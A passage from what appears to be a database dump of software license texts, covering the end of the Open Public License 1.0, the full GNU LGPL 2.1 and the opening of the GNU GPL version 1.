directory file) where a user\nwould be likely to look for such a notice. You may choose to offer, and to\ncharge a fee for, warranty, support, indemnity or liability obligations to\none or more recipients of Covered Code. However, You may do so only on Your\nown behalf, and not on behalf of the Initial Developer or any Contributor.\nYou must make it absolutely clear that any such warranty, support, indemnity\nor liability obligation is offered by You alone, and You hereby agree to indemnify\nthe Initial Developer and every Contributor for any liability incurred by\nthe Initial Developer or such Contributor as a result of warranty, support,\nindemnity or liability terms You offer.\n\n3.6. Distribution of Executable Versions. You may distribute Covered Code\nin Executable form only if the requirements of Section 3.1-3.5 have been met\nfor that Covered Code, and if You include a notice stating that the Source\nCode version of the Covered Code is available under the terms of this License,\nincluding a description of how and where You have fulfilled the obligations\nof Section 3.2. The notice must be conspicuously included in any notice in\nan Executable version, related documentation or collateral in which You describe\nrecipients\' rights relating to the Covered Code. You may distribute the Executable\nversion of Covered Code under a license of Your choice, which may contain\nterms different from this License, provided that You are in compliance with\nthe terms of this License and that the license for the Executable version\ndoes not attempt to limit or alter the recipient\'s rights in the Source Code\nversion from the rights set forth in this License. If You distribute the Executable\nversion under a different license You must make it absolutely clear that any\nterms which differ from this License are offered by You alone, not by the\nInitial Developer or any Contributor. You hereby agree to indemnify the Initial\nDeveloper and every Contributor for any liability incurred by the Initial\nDeveloper or such Contributor as a result of any such terms You offer. If\nyou distribute executable versions containing Covered Code, you must reproduce\nthe notice in Exhibit B in the documentation and/or other materials provided\nwith the product.\n\n3.7. Larger Works. You may create a Larger Work by combining Covered Code\nwith other code not governed by the terms of this License and distribute the\nLarger Work as a single product. In such a case, You must make sure the requirements\nof this License are fulfilled for the Covered Code.\n\n 4. Inability to Comply Due to Statute or Regulation.\n\nIf it is impossible for You to comply with any of the terms of this License\nwith respect to some or all of the Covered Code due to statute or regulation\nthen You must: (a) comply with the terms of this License to the maximum extent\npossible; and (b) Cite all of the statutes or regulations that prohibit you\nfrom complying fully with this license. (c) describe the limitations and the\ncode they affect. Such description must be included in the LEGAL file described\nin Section 3.4 and must be included with all distributions of the Source Code.\nExcept to the extent prohibited by statute or regulation, such description\nmust be sufficiently detailed for a recipient of ordinary skill to be able\nto understand it.\n\n 5. Application of this License.\n\nThis License applies to code to which the Initial Developer has attached the\nnotice in Exhibit A, and to related Covered Code.\n\n 6. Versions of the License.\n\n6.1. New Versions. License Author may publish revised and/or new versions\nof the License from time to time. Each version will be given a distinguishing\nversion number and shall be submitted to opensource.org for certification.\n\n6.2. Effect of New Versions. Once Covered Code has been published under a\nparticular version of the License, You may always continue to use it under\nthe terms of that version. You may also choose to use such Covered Code under\nthe terms of any subsequent version of the License published by Initial Developer.\nNo one other than Initial Developer has the right to modify the terms applicable\nto Covered Code created under this License.\n\n6.3. Derivative Works. If you create or use a modified version of this License,\nexcept in association with the required Developer Specific License described\nin section 6.4, (which you may only do in order to apply it to code which\nis not already Covered Code governed by this License), you must (a) rename\nYour license so that the phrases ``Open\'\', ``OpenPL\'\', ``OPL\'\' or any confusingly\nsimilar phrase do not appear anywhere in your license and (b) otherwise make\nit clear that your version of the license contains terms which differ from\nthe Open Public License. (Filling in the name of the Initial Developer, Original\nCode or Contributor in the notice described in Exhibit A shall not of themselves\nbe deemed to be modifications of this License.)\n\n 6.4. Required Additional Developer Specific License\n\nThis license is a union of the following two parts that should be found as\ntext files in the same place (directory), in the order of preeminence:\n\n [1] A Developer specific license.\n\n[2] The contents of this file OPL_1_0.TXT, stating the general licensing policy\nof the software.\n\nIn case of conflicting dispositions in the parts of this license, the terms\nof the lower-numbered part will always be superseded by the terms of the higher\nnumbered part.\n\n 7. DISCLAIMER OF WARRANTY.\n\nCOVERED CODE IS PROVIDED UNDER THIS LICENSE ON AN \"AS IS\" BASIS, WITHOUT WARRANTY\nOF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, WITHOUT LIMITATION, WARRANTIES\nTHAT THE COVERED CODE IS FREE OF DEFECTS, MERCHANTABLE, FIT FOR A PARTICULAR\nPURPOSE OR NON-INFRINGING. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE\nOF THE COVERED CODE IS WITH YOU. SHOULD ANY COVERED CODE PROVE DEFECTIVE IN\nANY RESPECT, YOU (NOT THE INITIAL DEVELOPER OR ANY OTHER CONTRIBUTOR) ASSUME\nTHE COST OF ANY NECESSARY SERVICING, REPAIR OR CORRECTION. THIS DISCLAIMER\nOF WARRANTY CONSTITUTES AN ESSENTIAL PART OF THIS LICENSE. NO USE OF ANY COVERED\nCODE IS AUTHORIZED HEREUNDER EXCEPT UNDER THIS DISCLAIMER.\n\n 8. TERMINATION.\n\n 8.1 Termination upon Breach\n\nThis License and the rights granted hereunder will terminate automatically\nif You fail to comply with terms herein and fail to cure such breach within\n30 days of becoming aware of the breach. All sublicenses to the Covered Code,\nwhich are properly granted, shall survive any termination of this License.\nProvisions that, by their nature, must remain in effect beyond the termination\nof this License shall survive.\n\n8.2. Termination Upon Litigation. If You initiate litigation by asserting\na patent infringement claim (excluding declatory judgment actions) against\nInitial Developer or a Contributor (the Initial Developer or Contributor against\nwhom You file such action is referred to as \"Participant\") alleging that:\n\n(a) such Participant\'s Contributor Version directly or indirectly infringes\nany patent, then any and all rights granted by such Participant to You under\nSections 2.1 and/or 2.2 of this License shall, upon 60 days notice from Participant\nterminate prospectively, unless if within 60 days after receipt of notice\nYou either: (i) agree in writing to pay Participant a mutually agreeable reasonable\nroyalty for Your past and future use of Modifications made by such Participant,\nor (ii) withdraw Your litigation claim with respect to the Contributor Version\nagainst such Participant. If within 60 days of notice, a reasonable royalty\nand payment arrangement are not mutually agreed upon in writing by the parties\nor the litigation claim is not withdrawn, the rights granted by Participant\nto You under Sections 2.1 and/or 2.2 automatically terminate at the expiration\nof the 60 day notice period specified above.\n\n(b) any software, hardware, or device, other than such Participant\'s Contributor\nVersion, directly or indirectly infringes any patent, then any rights granted\nto You by such Participant under Sections 2.1(b) and 2.2(b) are revoked effective\nas of the date You first made, used, sold, distributed, or had made, Modifications\nmade by that Participant.\n\n8.3. If You assert a patent infringement claim against Participant alleging\nthat such Participant\'s Contributor Version directly or indirectly infringes\nany patent where such claim is resolved (such as by license or settlement)\nprior to the initiation of patent infringement litigation, then the reasonable\nvalue of the licenses granted by such Participant under Sections 2.1 or 2.2\nshall be taken into account in determining the amount or value of any payment\nor license.\n\n8.4. In the event of termination under Sections 8.1 or 8.2 above, all end\nuser license agreements (excluding distributors and resellers) which have\nbeen validly granted by You or any distributor hereunder prior to termination\nshall survive termination.\n\n 9. LIMITATION OF LIABILITY.\n\nUNDER NO CIRCUMSTANCES AND UNDER NO LEGAL THEORY, WHETHER TORT (INCLUDING\nNEGLIGENCE), CONTRACT, OR OTHERWISE, SHALL THE INITIAL DEVELOPER, ANY OTHER\nCONTRIBUTOR, OR ANY DISTRIBUTOR OF COVERED CODE, OR ANY SUPPLIER OF ANY OF\nSUCH PARTIES, BE LIABLE TO YOU OR ANY OTHER PERSON FOR ANY INDIRECT, SPECIAL,\nINCIDENTAL, OR CONSEQUENTIAL DAMAGES OF ANY CHARACTER INCLUDING, WITHOUT LIMITATION,\nDAMAGES FOR LOSS OF GOODWILL, WORK STOPPAGE, COMPUTER FAILURE OR MALFUNCTION,\nOR ANY AND ALL OTHER COMMERCIAL DAMAGES OR LOSSES, EVEN IF SUCH PARTY SHALL\nHAVE BEEN INFORMED OF THE POSSIBILITY OF SUCH DAMAGES. THIS LIMITATION OF\nLIABILITY SHALL NOT APPLY TO LIABILITY FOR DEATH OR PERSONAL INJURY RESULTING\nFROM SUCH PARTY\'S NEGLIGENCE TO THE EXTENT APPLICABLE LAW PROHIBITS SUCH LIMITATION.\nSOME JURISDICTIONS DO NOT ALLOW THE EXCLUSION OR LIMITATION OF INCIDENTAL\nOR CONSEQUENTIAL DAMAGES, SO THAT EXCLUSION AND LIMITATION MAY NOT APPLY TO\nYOU.\n\n 10. U.S. GOVERNMENT END USERS.\n\nThe Covered Code is a ``commercial item,\'\' as that term is defined in 48 C.F.R.\n2.101 (Oct. 1995), consisting of ``commercial computer software\'\' and ``commercial\ncomputer software documentation,\'\' as such terms are used in 48 C.F.R. 12.212\n(Sept. 1995). Consistent with 48 C.F.R. 12.212 and 48 C.F.R. 227.7202-1 through\n227.7202-4 (June 1995), all U.S. Government End Users acquire Covered Code\nwith only those rights set forth herein.\n\n 11. MISCELLANEOUS.\n\nhis section was intentionally left blank. The contents of this section are\nfound in the corresponding addendum described above.\n\n 12. RESPONSIBILITY FOR CLAIMS.\n\nExcept in cases where another Contributor has failed to comply with Section\n3.4, You are responsible for damages arising, directly or indirectly, out\nof Your utilization of rights under this License, based on the number of copies\nof Covered Code you made available, the revenues you received from utilizing\nsuch rights, and other relevant factors. You agree to work with affected parties\nto distribute with Initial Developer responsibility on an equitable basis.\nEXHIBIT A.\n\nText for this Exhibit A is found in the corresponding addendum, described\nin section 6.4 above, text file provided by the Initial Developer. This license\nis not valid or complete with out that file.\n\nEXHIBIT B.\n\nText for this Exhibit B is found in the corresponding addendum, described\nin section 6.4 above, text file provided by the Initial Developer. This license\nis not valid or complete with out that file.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(314,'LGPL-2.1-or-later','GNU LESSER GENERAL PUBLIC LICENSE\n\nVersion 2.1, February 1999\n\nCopyright (C) 1991, 1999 Free Software Foundation, Inc.\n\n51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA\n\nEveryone is permitted to copy and distribute verbatim copies of this license\ndocument, but changing it is not allowed.\n\n[This is the first released version of the Lesser GPL. It also counts as the\nsuccessor of the GNU Library Public License, version 2, hence the version\nnumber 2.1.]\n\nPreamble\n\nThe licenses for most software are designed to take away your freedom to share\nand change it. By contrast, the GNU General Public Licenses are intended to\nguarantee your freedom to share and change free software--to make sure the\nsoftware is free for all its users.\n\nThis license, the Lesser General Public License, applies to some specially\ndesignated software packages--typically libraries--of the Free Software Foundation\nand other authors who decide to use it. You can use it too, but we suggest\nyou first think carefully about whether this license or the ordinary General\nPublic License is the better strategy to use in any particular case, based\non the explanations below.\n\nWhen we speak of free software, we are referring to freedom of use, not price.\nOur General Public Licenses are designed to make sure that you have the freedom\nto distribute copies of free software (and charge for this service if you\nwish); that you receive source code or can get it if you want it; that you\ncan change the software and use pieces of it in new free programs; and that\nyou are informed that you can do these things.\n\nTo protect your rights, we need to make restrictions that forbid distributors\nto deny you these rights or to ask you to surrender these rights. These restrictions\ntranslate to certain responsibilities for you if you distribute copies of\nthe library or if you modify it.\n\nFor example, if you distribute copies of the library, whether gratis or for\na fee, you must give the recipients all the rights that we gave you. You must\nmake sure that they, too, receive or can get the source code. If you link\nother code with the library, you must provide complete object files to the\nrecipients, so that they can relink them with the library after making changes\nto the library and recompiling it. And you must show them these terms so they\nknow their rights.\n\nWe protect your rights with a two-step method: (1) we copyright the library,\nand (2) we offer you this license, which gives you legal permission to copy,\ndistribute and/or modify the library.\n\nTo protect each distributor, we want to make it very clear that there is no\nwarranty for the free library. Also, if the library is modified by someone\nelse and passed on, the recipients should know that what they have is not\nthe original version, so that the original author\'s reputation will not be\naffected by problems that might be introduced by others.\n\nFinally, software patents pose a constant threat to the existence of any free\nprogram. We wish to make sure that a company cannot effectively restrict the\nusers of a free program by obtaining a restrictive license from a patent holder.\nTherefore, we insist that any patent license obtained for a version of the\nlibrary must be consistent with the full freedom of use specified in this\nlicense.\n\nMost GNU software, including some libraries, is covered by the ordinary GNU\nGeneral Public License. This license, the GNU Lesser General Public License,\napplies to certain designated libraries, and is quite different from the ordinary\nGeneral Public License. We use this license for certain libraries in order\nto permit linking those libraries into non-free programs.\n\nWhen a program is linked with a library, whether statically or using a shared\nlibrary, the combination of the two is legally speaking a combined work, a\nderivative of the original library. The ordinary General Public License therefore\npermits such linking only if the entire combination fits its criteria of freedom.\nThe Lesser General Public License permits more lax criteria for linking other\ncode with the library.\n\nWe call this license the \"Lesser\" General Public License because it does Less\nto protect the user\'s freedom than the ordinary General Public License. It\nalso provides other free software developers Less of an advantage over competing\nnon-free programs. These disadvantages are the reason we use the ordinary\nGeneral Public License for many libraries. However, the Lesser license provides\nadvantages in certain special circumstances.\n\nFor example, on rare occasions, there may be a special need to encourage the\nwidest possible use of a certain library, so that it becomes a de-facto standard.\nTo achieve this, non-free programs must be allowed to use the library. A more\nfrequent case is that a free library does the same job as widely used non-free\nlibraries. In this case, there is little to gain by limiting the free library\nto free software only, so we use the Lesser General Public License.\n\nIn other cases, permission to use a particular library in non-free programs\nenables a greater number of people to use a large body of free software. For\nexample, permission to use the GNU C Library in non-free programs enables\nmany more people to use the whole GNU operating system, as well as its variant,\nthe GNU/Linux operating system.\n\nAlthough the Lesser General Public License is Less protective of the users\'\nfreedom, it does ensure that the user of a program that is linked with the\nLibrary has the freedom and the wherewithal to run that program using a modified\nversion of the Library.\n\nThe precise terms and conditions for copying, distribution and modification\nfollow. Pay close attention to the difference between a \"work based on the\nlibrary\" and a \"work that uses the library\". The former contains code derived\nfrom the library, whereas the latter must be combined with the library in\norder to run.\n\nTERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION\n\n0. This License Agreement applies to any software library or other program\nwhich contains a notice placed by the copyright holder or other authorized\nparty saying it may be distributed under the terms of this Lesser General\nPublic License (also called \"this License\"). Each licensee is addressed as\n\"you\".\n\nA \"library\" means a collection of software functions and/or data prepared\nso as to be conveniently linked with application programs (which use some\nof those functions and data) to form executables.\n\nThe \"Library\", below, refers to any such software library or work which has\nbeen distributed under these terms. A \"work based on the Library\" means either\nthe Library or any derivative work under copyright law: that is to say, a\nwork containing the Library or a portion of it, either verbatim or with modifications\nand/or translated straightforwardly into another language. (Hereinafter, translation\nis included without limitation in the term \"modification\".)\n\n\"Source code\" for a work means the preferred form of the work for making modifications\nto it. For a library, complete source code means all the source code for all\nmodules it contains, plus any associated interface definition files, plus\nthe scripts used to control compilation and installation of the library.\n\nActivities other than copying, distribution and modification are not covered\nby this License; they are outside its scope. The act of running a program\nusing the Library is not restricted, and output from such a program is covered\nonly if its contents constitute a work based on the Library (independent of\nthe use of the Library in a tool for writing it). Whether that is true depends\non what the Library does and what the program that uses the Library does.\n\n1. You may copy and distribute verbatim copies of the Library\'s complete source\ncode as you receive it, in any medium, provided that you conspicuously and\nappropriately publish on each copy an appropriate copyright notice and disclaimer\nof warranty; keep intact all the notices that refer to this License and to\nthe absence of any warranty; and distribute a copy of this License along with\nthe Library.\n\nYou may charge a fee for the physical act of transferring a copy, and you\nmay at your option offer warranty protection in exchange for a fee.\n\n2. You may modify your copy or copies of the Library or any portion of it,\nthus forming a work based on the Library, and copy and distribute such modifications\nor work under the terms of Section 1 above, provided that you also meet all\nof these conditions:\n\n a) The modified work must itself be a software library.\n\nb) You must cause the files modified to carry prominent notices stating that\nyou changed the files and the date of any change.\n\nc) You must cause the whole of the work to be licensed at no charge to all\nthird parties under the terms of this License.\n\nd) If a facility in the modified Library refers to a function or a table of\ndata to be supplied by an application program that uses the facility, other\nthan as an argument passed when the facility is invoked, then you must make\na good faith effort to ensure that, in the event an application does not supply\nsuch function or table, the facility still operates, and performs whatever\npart of its purpose remains meaningful.\n\n(For example, a function in a library to compute square roots has a purpose\nthat is entirely well-defined independent of the application. Therefore, Subsection\n2d requires that any application-supplied function or table used by this function\nmust be optional: if the application does not supply it, the square root function\nmust still compute square roots.)\n\nThese requirements apply to the modified work as a whole. If identifiable\nsections of that work are not derived from the Library, and can be reasonably\nconsidered independent and separate works in themselves, then this License,\nand its terms, do not apply to those sections when you distribute them as\nseparate works. But when you distribute the same sections as part of a whole\nwhich is a work based on the Library, the distribution of the whole must be\non the terms of this License, whose permissions for other licensees extend\nto the entire whole, and thus to each and every part regardless of who wrote\nit.\n\nThus, it is not the intent of this section to claim rights or contest your\nrights to work written entirely by you; rather, the intent is to exercise\nthe right to control the distribution of derivative or collective works based\non the Library.\n\nIn addition, mere aggregation of another work not based on the Library with\nthe Library (or with a work based on the Library) on a volume of a storage\nor distribution medium does not bring the other work under the scope of this\nLicense.\n\n3. You may opt to apply the terms of the ordinary GNU General Public License\ninstead of this License to a given copy of the Library. To do this, you must\nalter all the notices that refer to this License, so that they refer to the\nordinary GNU General Public License, version 2, instead of to this License.\n(If a newer version than version 2 of the ordinary GNU General Public License\nhas appeared, then you can specify that version instead if you wish.) Do not\nmake any other change in these notices.\n\nOnce this change is made in a given copy, it is irreversible for that copy,\nso the ordinary GNU General Public License applies to all subsequent copies\nand derivative works made from that copy.\n\nThis option is useful when you wish to copy part of the code of the Library\ninto a program that is not a library.\n\n4. You may copy and distribute the Library (or a portion or derivative of\nit, under Section 2) in object code or executable form under the terms of\nSections 1 and 2 above provided that you accompany it with the complete corresponding\nmachine-readable source code, which must be distributed under the terms of\nSections 1 and 2 above on a medium customarily used for software interchange.\n\nIf distribution of object code is made by offering access to copy from a designated\nplace, then offering equivalent access to copy the source code from the same\nplace satisfies the requirement to distribute the source code, even though\nthird parties are not compelled to copy the source along with the object code.\n\n5. A program that contains no derivative of any portion of the Library, but\nis designed to work with the Library by being compiled or linked with it,\nis called a \"work that uses the Library\". Such a work, in isolation, is not\na derivative work of the Library, and therefore falls outside the scope of\nthis License.\n\nHowever, linking a \"work that uses the Library\" with the Library creates an\nexecutable that is a derivative of the Library (because it contains portions\nof the Library), rather than a \"work that uses the library\". The executable\nis therefore covered by this License. Section 6 states terms for distribution\nof such executables.\n\nWhen a \"work that uses the Library\" uses material from a header file that\nis part of the Library, the object code for the work may be a derivative work\nof the Library even though the source code is not. Whether this is true is\nespecially significant if the work can be linked without the Library, or if\nthe work is itself a library. The threshold for this to be true is not precisely\ndefined by law.\n\nIf such an object file uses only numerical parameters, data structure layouts\nand accessors, and small macros and small inline functions (ten lines or less\nin length), then the use of the object file is unrestricted, regardless of\nwhether it is legally a derivative work. (Executables containing this object\ncode plus portions of the Library will still fall under Section 6.)\n\nOtherwise, if the work is a derivative of the Library, you may distribute\nthe object code for the work under the terms of Section 6. Any executables\ncontaining that work also fall under Section 6, whether or not they are linked\ndirectly with the Library itself.\n\n6. As an exception to the Sections above, you may also combine or link a \"work\nthat uses the Library\" with the Library to produce a work containing portions\nof the Library, and distribute that work under terms of your choice, provided\nthat the terms permit modification of the work for the customer\'s own use\nand reverse engineering for debugging such modifications.\n\nYou must give prominent notice with each copy of the work that the Library\nis used in it and that the Library and its use are covered by this License.\nYou must supply a copy of this License. If the work during execution displays\ncopyright notices, you must include the copyright notice for the Library among\nthem, as well as a reference directing the user to the copy of this License.\nAlso, you must do one of these things:\n\na) Accompany the work with the complete corresponding machine-readable source\ncode for the Library including whatever changes were used in the work (which\nmust be distributed under Sections 1 and 2 above); and, if the work is an\nexecutable linked with the Library, with the complete machine-readable \"work\nthat uses the Library\", as object code and/or source code, so that the user\ncan modify the Library and then relink to produce a modified executable containing\nthe modified Library. (It is understood that the user who changes the contents\nof definitions files in the Library will not necessarily be able to recompile\nthe application to use the modified definitions.)\n\nb) Use a suitable shared library mechanism for linking with the Library. A\nsuitable mechanism is one that (1) uses at run time a copy of the library\nalready present on the user\'s computer system, rather than copying library\nfunctions into the executable, and (2) will operate properly with a modified\nversion of the library, if the user installs one, as long as the modified\nversion is interface-compatible with the version that the work was made with.\n\nc) Accompany the work with a written offer, valid for at least three years,\nto give the same user the materials specified in Subsection 6a, above, for\na charge no more than the cost of performing this distribution.\n\nd) If distribution of the work is made by offering access to copy from a designated\nplace, offer equivalent access to copy the above specified materials from\nthe same place.\n\ne) Verify that the user has already received a copy of these materials or\nthat you have already sent this user a copy.\n\nFor an executable, the required form of the \"work that uses the Library\" must\ninclude any data and utility programs needed for reproducing the executable\nfrom it. However, as a special exception, the materials to be distributed\nneed not include anything that is normally distributed (in either source or\nbinary form) with the major components (compiler, kernel, and so on) of the\noperating system on which the executable runs, unless that component itself\naccompanies the executable.\n\nIt may happen that this requirement contradicts the license restrictions of\nother proprietary libraries that do not normally accompany the operating system.\nSuch a contradiction means you cannot use both them and the Library together\nin an executable that you distribute.\n\n7. You may place library facilities that are a work based on the Library side-by-side\nin a single library together with other library facilities not covered by\nthis License, and distribute such a combined library, provided that the separate\ndistribution of the work based on the Library and of the other library facilities\nis otherwise permitted, and provided that you do these two things:\n\na) Accompany the combined library with a copy of the same work based on the\nLibrary, uncombined with any other library facilities. This must be distributed\nunder the terms of the Sections above.\n\nb) Give prominent notice with the combined library of the fact that part of\nit is a work based on the Library, and explaining where to find the accompanying\nuncombined form of the same work.\n\n8. You may not copy, modify, sublicense, link with, or distribute the Library\nexcept as expressly provided under this License. Any attempt otherwise to\ncopy, modify, sublicense, link with, or distribute the Library is void, and\nwill automatically terminate your rights under this License. However, parties\nwho have received copies, or rights, from you under this License will not\nhave their licenses terminated so long as such parties remain in full compliance.\n\n9. You are not required to accept this License, since you have not signed\nit. However, nothing else grants you permission to modify or distribute the\nLibrary or its derivative works. These actions are prohibited by law if you\ndo not accept this License. Therefore, by modifying or distributing the Library\n(or any work based on the Library), you indicate your acceptance of this License\nto do so, and all its terms and conditions for copying, distributing or modifying\nthe Library or works based on it.\n\n10. Each time you redistribute the Library (or any work based on the Library),\nthe recipient automatically receives a license from the original licensor\nto copy, distribute, link with or modify the Library subject to these terms\nand conditions. You may not impose any further restrictions on the recipients\'\nexercise of the rights granted herein. You are not responsible for enforcing\ncompliance by third parties with this License.\n\n11. If, as a consequence of a court judgment or allegation of patent infringement\nor for any other reason (not limited to patent issues), conditions are imposed\non you (whether by court order, agreement or otherwise) that contradict the\nconditions of this License, they do not excuse you from the conditions of\nthis License. If you cannot distribute so as to satisfy simultaneously your\nobligations under this License and any other pertinent obligations, then as\na consequence you may not distribute the Library at all. For example, if a\npatent license would not permit royalty-free redistribution of the Library\nby all those who receive copies directly or indirectly through you, then the\nonly way you could satisfy both it and this License would be to refrain entirely\nfrom distribution of the Library.\n\nIf any portion of this section is held invalid or unenforceable under any\nparticular circumstance, the balance of the section is intended to apply,\nand the section as a whole is intended to apply in other circumstances.\n\nIt is not the purpose of this section to induce you to infringe any patents\nor other property right claims or to contest validity of any such claims;\nthis section has the sole purpose of protecting the integrity of the free\nsoftware distribution system which is implemented by public license practices.\nMany people have made generous contributions to the wide range of software\ndistributed through that system in reliance on consistent application of that\nsystem; it is up to the author/donor to decide if he or she is willing to\ndistribute software through any other system and a licensee cannot impose\nthat choice.\n\nThis section is intended to make thoroughly clear what is believed to be a\nconsequence of the rest of this License.\n\n12. If the distribution and/or use of the Library is restricted in certain\ncountries either by patents or by copyrighted interfaces, the original copyright\nholder who places the Library under this License may add an explicit geographical\ndistribution limitation excluding those countries, so that distribution is\npermitted only in or among countries not thus excluded. In such case, this\nLicense incorporates the limitation as if written in the body of this License.\n\n13. The Free Software Foundation may publish revised and/or new versions of\nthe Lesser General Public License from time to time. Such new versions will\nbe similar in spirit to the present version, but may differ in detail to address\nnew problems or concerns.\n\nEach version is given a distinguishing version number. If the Library specifies\na version number of this License which applies to it and \"any later version\",\nyou have the option of following the terms and conditions either of that version\nor of any later version published by the Free Software Foundation. If the\nLibrary does not specify a license version number, you may choose any version\never published by the Free Software Foundation.\n\n14. If you wish to incorporate parts of the Library into other free programs\nwhose distribution conditions are incompatible with these, write to the author\nto ask for permission. For software which is copyrighted by the Free Software\nFoundation, write to the Free Software Foundation; we sometimes make exceptions\nfor this. Our decision will be guided by the two goals of preserving the free\nstatus of all derivatives of our free software and of promoting the sharing\nand reuse of software generally.\n\n NO WARRANTY\n\n15. BECAUSE THE LIBRARY IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR\nTHE LIBRARY, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE\nSTATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE LIBRARY\n\"AS IS\" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING,\nBUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS\nFOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE\nOF THE LIBRARY IS WITH YOU. SHOULD THE LIBRARY PROVE DEFECTIVE, YOU ASSUME\nTHE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION.\n\n16. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING\nWILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE\nTHE LIBRARY AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY\nGENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE\nOR INABILITY TO USE THE LIBRARY (INCLUDING BUT NOT LIMITED TO LOSS OF DATA\nOR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES\nOR A FAILURE OF THE LIBRARY TO OPERATE WITH ANY OTHER SOFTWARE), EVEN IF SUCH\nHOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.\nEND OF TERMS AND CONDITIONS\n\nHow to Apply These Terms to Your New Libraries\n\nIf you develop a new library, and you want it to be of the greatest possible\nuse to the public, we recommend making it free software that everyone can\nredistribute and change. You can do so by permitting redistribution under\nthese terms (or, alternatively, under the terms of the ordinary General Public\nLicense).\n\nTo apply these terms, attach the following notices to the library. It is safest\nto attach them to the start of each source file to most effectively convey\nthe exclusion of warranty; and each file should have at least the \"copyright\"\nline and a pointer to where the full notice is found.\n\n<one line to give the library\'s name and an idea of what it does.>\n\nCopyright (C) <year> <name of author>\n\nThis library is free software; you can redistribute it and/or modify it under\nthe terms of the GNU Lesser General Public License as published by the Free\nSoftware Foundation; either version 2.1 of the License, or (at your option)\nany later version.\n\nThis library is distributed in the hope that it will be useful, but WITHOUT\nANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS\nFOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more\ndetails.\n\nYou should have received a copy of the GNU Lesser General Public License along\nwith this library; if not, write to the Free Software Foundation, Inc., 51\nFranklin Street, Fifth Floor, Boston, MA 02110-1301 USA\n\nAlso add information on how to contact you by electronic and paper mail.\n\nYou should also get your employer (if you work as a programmer) or your school,\nif any, to sign a \"copyright disclaimer\" for the library, if necessary. Here\nis a sample; alter the names:\n\nYoyodyne, Inc., hereby disclaims all copyright interest in\n\nthe library `Frob\' (a library for tweaking knobs) written\n\nby James Random Hacker.\n\n< signature of Ty Coon > , 1 April 1990\n\nTy Coon, President of Vice\n\nThat\'s all there is to it!\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(315,'GPL-1.0-or-later','GNU GENERAL PUBLIC LICENSE\n\nVersion 1, February 1989\n\nCopyright (C) 1989 Free Software Foundation, Inc. 51 Franklin St, Fifth Floor,\nBoston, MA 02110-1301 USA\n\nEveryone is permitted to copy and distribute verbatim copies of this license\ndocument, but changing it is not allowed.\n\nPreamble\n\nThe license agreements of most software companies try to keep users at the\nmercy of those companies. By contrast, our General Public License is intended\nto guarantee your freedom to share and change free software--to make sure\nthe software is free for all its users. The General Public License applies\nto the Free Software Foundation\'s software and to any other program whose\nauthors commit to using it. You can use it for your programs, too.\n\nWhen we speak of free software, we are referring to freedom, not price. Specifically,\nthe General Public License is designed to make sure that you have the freedom\nto give away or sell copies of free software, that you receive source code\nor can get it if you want it, that you can change the software or use pieces\nof it in new free programs; and that you know you can do these things.\n\nTo protect your rights, we need to make restrictions that forbid anyone to\ndeny you these rights or to ask you to surrender the rights. These restrictions\ntranslate to certain responsibilities for you if you distribute copies of\nthe software, or if you modify it.\n\nFor example, if you distribute copies of a such a program, whether gratis\nor for a fee, you must give the recipients all the rights that you have. You\nmust make sure that they, too, receive or can get the source code. And you\nmust tell them their rights.\n\nWe protect your rights with two steps: (1) copyright the software, and (2)\noffer you this license which gives you legal permission to copy, distribute\nand/or modify the software.\n\nAlso, for each author\'s protection and ours, we want to make certain that\neveryone understands that there is no warranty for this free software. If\nthe software is modified by someone else and passed on, we want its recipients\nto know that what they have is not the original, so that any problems introduced\nby others will not reflect on the original authors\' reputations.\n\nThe precise terms and conditions for copying, distribution and modification\nfollow.\n\nGNU GENERAL PUBLIC LICENSE TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION\nAND MODIFICATION\n\n0. This License Agreement applies to any program or other work which contains\na notice placed by the copyright holder saying it may be distributed under\nthe terms of this General Public License. The \"Program\", below, refers to\nany such program or work, and a \"work based on the Program\" means either the\nProgram or any work containing the Program or a portion of it, either verbatim\nor with modifications. Each licensee is addressed as \"you\".\n\n1. You may copy and distribute verbatim copies of the Program\'s source code\nas you receive it, in any medium, provided that you conspicuously and appropriately\npublish on each copy an appropriate copyright notice and disclaimer of warranty;\nkeep intact all the notices that refer to this General Public License and\nto the absence of any warranty; and give any other recipients of the Program\na copy of this General Public License along with the Program. You may charge\na fee for the physical act of transferring a copy.\n\n2. You may modify your copy or copies of the Program or any portion of it,\nand copy and distribute such modifications under the terms of Paragraph 1\nabove, provided that you also do the following:\n\na) cause the modified files to carry prominent notices stating that you changed\nthe files and the date of any change; and\n\nb) cause the whole of any work that you distribute or publish, that in whole\nor in part contains the Program or any part thereof, either with or without\nmodifications, to be licensed at no charge to all third parties under the\nterms of this General Public License (except that you may choose to grant\nwarranty protection to some or all third parties, at your option).\n\nc) If the modified program normally reads commands interactively when run,\nyou must cause it, when started running for such interactive use in the simplest\nand most usual way, to print or display an announcement including an appropriate\ncopyright notice and a notice that there is no warranty (or else, saying that\nyou provide a warranty) and that users may redistribute the program under\nthese conditions, and telling the user how to view a copy of this General\nPublic 